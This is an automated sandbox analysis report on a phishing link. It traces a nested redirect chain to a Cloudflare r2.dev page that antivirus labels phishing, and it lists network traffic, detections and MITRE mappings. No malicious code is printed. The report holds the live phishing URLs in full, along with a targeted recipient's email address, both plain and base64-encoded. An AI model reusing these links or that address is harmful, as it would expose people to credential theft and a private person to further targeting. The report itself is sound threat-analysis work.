Edit tour

Windows Analysis Report
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0

Overview

General Information

Sample URL:	https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb
Analysis ID:	1591896
Infos:

Detection

Phisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected Phisher

AI detected suspicious Javascript

Detected suspicious crossdomain redirect

HTML body with high number of embedded images detected

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 7152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1700,i,16758383502370779035,13977337357535533043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 2928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_69	JoeSecurity_Phisher_2	Yara detected Phisher	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#	Avira URL Cloud: Label: phishing
Source: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html	Avira URL Cloud: Label: phishing

Phishing

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_69, type: DROPPED

AI detected suspicious Javascript

Source: 0.2.i.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.de... This script exhibits several high-risk behaviors:1. Dynamic code execution: The script uses the 'eval()' function to execute remote or dynamic code, which poses a significant security risk.2. Data exfiltration: The script sends sensitive data (e.g., cookies, user information, session identifiers) to an external server, which could be used for malicious purposes.3. Obfuscated code/URLs: The script uses heavily encoded strings and obfuscated URLs, making it difficult to determine the true purpose of the script.Given these high-risk indicators, along with the lack of any clear legitimate context, this script is highly suspicious and should be considered a high-risk threat.

Source: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org

HTTP Parser: Total embedded image size: 47808

Source: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org

HTTP Parser: No favicon

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: click.pstmrk.it to https://pshieldnemt.com/wp

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.76
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U HTTP/1.1Host: click.pstmrk.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fpshieldnemt.com%25252Fwp%252FGnrm%252FJ6y6AQ%252FAQ%252Fe40c43dd-851b-4580-9323-fb61c1f4e855%252F1%252FDz8wyx-xnG%2FGnrm%2FK6y6AQ%2FAQ%2F08a87d58-9017-42a2-87a2-16d811ad0020%2F1%2FAQhuEqjtZr/Gnrm/LKy6AQ/AQ/f082e7c9-7f04-4f29-b74f-bf5134bab4b2/1/6eo6CGyRlQ HTTP/1.1Host: click.pstmrk.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3s/click.pstmrk.it%2F3s%2Fpshieldnemt.com%252Fwp%2FGnrm%2FJ6y6AQ%2FAQ%2Fe40c43dd-851b-4580-9323-fb61c1f4e855%2F1%2FDz8wyx-xnG/Gnrm/K6y6AQ/AQ/08a87d58-9017-42a2-87a2-16d811ad0020/1/AQhuEqjtZr HTTP/1.1Host: click.pstmrk.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /3s/pshieldnemt.com%2Fwp/Gnrm/J6y6AQ/AQ/e40c43dd-851b-4580-9323-fb61c1f4e855/1/Dz8wyx-xnG HTTP/1.1Host: click.pstmrk.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp HTTP/1.1Host: pshieldnemt.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp/ HTTP/1.1Host: pshieldnemt.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: pub-2d00d32ff6d84ef6999828eaf509b772.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://pshieldnemt.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-2d00d32ff6d84ef6999828eaf509b772.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: click.pstmrk.it
Source: global traffic	DNS traffic detected: DNS query: pshieldnemt.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:34:56 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 902696e4cf91422d-EWR

Source: chromecache_68.1.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_69.1.dr	String found in binary or memory: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#
Source: chromecache_68.1.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: classification engine

Classification label: mal60.phis.win@19/12@8/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1700,i,16758383502370779035,13977337357535533043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1700,i,16758383502370779035,13977337357535533043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#	100%	Avira URL Cloud	phishing
https://pshieldnemt.com/wp/	0%	Avira URL Cloud	safe
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/favicon.ico	100%	Avira URL Cloud	phishing
https://pshieldnemt.com/wp	0%	Avira URL Cloud	safe
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	172.66.0.235	true	false	high
pshieldnemt.com	188.40.248.200	true	false	unknown
click.pstmrk.it	63.32.154.112	true	false	high
www.google.com	142.250.185.132	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://click.pstmrk.it/3s/pshieldnemt.com%2Fwp/Gnrm/J6y6AQ/AQ/e40c43dd-851b-4580-9323-fb61c1f4e855/1/Dz8wyx-xnG	false		high
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U	false		high
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fpshieldnemt.com%25252Fwp%252FGnrm%252FJ6y6AQ%252FAQ%252Fe40c43dd-851b-4580-9323-fb61c1f4e855%252F1%252FDz8wyx-xnG%2FGnrm%2FK6y6AQ%2FAQ%2F08a87d58-9017-42a2-87a2-16d811ad0020%2F1%2FAQhuEqjtZr/Gnrm/LKy6AQ/AQ/f082e7c9-7f04-4f29-b74f-bf5134bab4b2/1/6eo6CGyRlQ	false		high
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fpshieldnemt.com%252Fwp%2FGnrm%2FJ6y6AQ%2FAQ%2Fe40c43dd-851b-4580-9323-fb61c1f4e855%2F1%2FDz8wyx-xnG/Gnrm/K6y6AQ/AQ/08a87d58-9017-42a2-87a2-16d811ad0020/1/AQhuEqjtZr	false		high
https://pshieldnemt.com/wp/	false	Avira URL Cloud: safe	unknown
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org	false		unknown
https://pshieldnemt.com/wp	false	Avira URL Cloud: safe	unknown
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html	false	Avira URL Cloud: phishing	unknown
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/favicon.ico	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

